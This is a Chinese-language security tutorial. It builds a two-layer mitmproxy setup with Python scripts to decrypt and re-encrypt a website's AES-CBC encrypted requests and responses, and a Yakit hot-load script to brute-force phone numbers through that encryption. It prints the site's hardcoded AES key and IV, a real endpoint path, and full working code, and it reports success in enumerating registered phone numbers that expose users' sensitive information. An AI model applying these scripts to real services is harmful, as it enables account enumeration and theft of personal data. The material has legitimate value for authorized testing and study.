实战自动化加解密&加密场景下的暴力破解
字数 774 2025-08-22 12:22:30
实战自动化加解密与加密场景下的暴力破解教学文档
1. 场景概述
当遇到一个网站,其请求和响应数据都经过加密处理时,我们需要在测试中查看明文数据并进行修改。本教程将介绍如何实现自动化加解密流程,以及在加密场景下进行暴力破解的方法。
2. 核心思路
2.1 代理架构设计
采用双层mitmproxy代理架构实现自动化加解密:
-
请求流程:
- 下游代理捕获浏览器请求并解密
- 明文数据发送到Yakit
- 上游代理将数据重新加密后发送到服务端
-
响应流程:
- 上游代理捕获服务端响应并解密
- 明文数据发送到Yakit
- 下游代理将数据重新加密后发送到浏览器
术语解释:
- 上游代理:离原始服务器更近的代理服务器
- 下游代理:离客户端更近的代理服务器
3. 加解密实现
3.1 加密算法分析
通过浏览器开发者工具分析加密逻辑,发现使用AES-CBC加密:
- Key:
60427a4badf685bd - IV:
0c67da205a1f6f57 - 填充模式: PKCS7
3.2 Python加解密代码
from Crypto.Cipher import AES
import base64
def aes_encrypt(plaintext, key, iv):
plaintext = plaintext.encode('utf-8')
cipher = AES.new(key, AES.MODE_CBC, iv)
padding_length = AES.block_size - len(plaintext) % AES.block_size
padding = bytes([padding_length] * padding_length)
plaintext = plaintext + padding
ciphertext = cipher.encrypt(plaintext)
return base64.b64encode(ciphertext).decode('utf-8')
def aes_encrypt2(plaintext):
key = b'60427a4badf685bd'
iv = b'0c67da205a1f6f57'
return aes_encrypt(plaintext, key, iv)
def aes_decrypt(ciphertext, key, iv):
ciphertext = base64.b64decode(ciphertext)
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = cipher.decrypt(ciphertext)
padding_length = plaintext[-1]
plaintext = plaintext[:-padding_length]
return plaintext.decode('utf-8')
def aes_decrypt2(ciphertext):
key = "60427a4badf685bd".encode('utf-8')
iv = "0c67da205a1f6f57".encode('utf-8')
return aes_decrypt(ciphertext, key, iv)
4. 代理配置实现
4.1 请求处理流程
下游代理(解密)
import json
from mitmproxy.http import HTTPFlow
from decrypt import *
def request(flow: HTTPFlow):
try:
if "/xxx/xxx/xxx" in flow.request.url:
data = json.loads(flow.request.content.decode())
if data:
encrypt_text = data['data']
print("请求加密数据:", encrypt_text)
decrypt_text = aes_decrypt2(encrypt_text)
print("请求解密数据:", decrypt_text)
flow.request.content = decrypt_text.encode()
except Exception as e:
pass
启动命令:
mitmdump -q -p 8888 -s .\aes_decrypt.py --mode upstream:http://127.0.0.1:8083/ --ssl-insecure
上游代理(加密)
import json
from mitmproxy.http import HTTPFlow
from decrypt import *
def request(flow: HTTPFlow):
try:
if "/xxx/xxx/xxx" in flow.request.url:
data = json.loads(flow.request.content.decode())
if data:
decrypt_text = json.dumps(data)
print("请求加密数据:", decrypt_text)
encrypt_text = aes_encrypt2(str(decrypt_text))
print("请求加密数据:", encrypt_text)
temp = {'data': encrypt_text}
flow.request.content = json.dumps(temp, ensure_ascii=False).encode()
except Exception as e:
pass
启动命令:
mitmdump -q -p 8989 -s .\aes_encrypt.py
4.2 响应处理流程
上游代理(解密)
def response(flow: HTTPFlow):
try:
if "/iccm/h5/visitor/" in flow.request.url:
data = json.loads(flow.response.content.decode())
if data:
encrypt_text = data['data']
print("响应解密数据:", encrypt_text)
decrypt_text = aes_decrypt2(encrypt_text)
decrypt_text = json.loads(decrypt_text)
data["data"] = decrypt_text
decrypt_text = json.dumps(data, ensure_ascii=False)
print("解密数据:", decrypt_text)
flow.response.content = decrypt_text.encode()
except Exception as e:
pass
下游代理(加密)
def response(flow: HTTPFlow):
try:
if "/iccm/h5/visitor/" in flow.request.url:
data = json.loads(flow.response.content.decode())
if data:
decrypt_text = json.dumps(data)
print("响应加密数据:", decrypt_text)
decrypt_text = data['data']
decrypt_text = json.dumps(decrypt_text)
encrypt_text = aes_encrypt2(decrypt_text)
data["data"] = encrypt_text
encrypt_text = json.dumps(data, ensure_ascii=False)
print("响应加密数据:", encrypt_text)
flow.response.content = encrypt_text.encode()
except Exception as e:
pass
5. Yakit热加载暴力破解
5.1 热加载脚本
dncryptAesCbc = func(p) {
key = "60427a4badf685bd"
iv = "0c67da205a1f6f57"
resultList = []
phoneDict = x"{{payload(phone)}}"
for phone in phoneDict {
m = {
"verifyCode": "",
"phone": phone
}
jsonInput = json.dumps(m)
result = codec.AESCBCEncryptWithPKCS7Padding(key, jsonInput, iv)
~ base64Result = codec.EncodeBase64(result)
r = {
"data": base64Result
}
resultList.Append(r)
}
return resultList
}
5.2 使用说明
- 在Yakit中加载手机号字典
- 使用热加载模块处理加密逻辑
- 执行暴力破解操作
6. 实际应用案例
通过该方法成功爆破出可利用手机号,验证了初始猜想:已注册用户可以直接看到敏感信息。
7. 总结
本教程详细介绍了:
- 双层mitmproxy代理架构实现自动化加解密
- AES-CBC加解密的Python实现
- 代理请求和响应的处理流程
- Yakit热加载实现加密场景下的暴力破解
这种方法适用于需要对加密数据进行安全测试的场景,可以有效提高测试效率。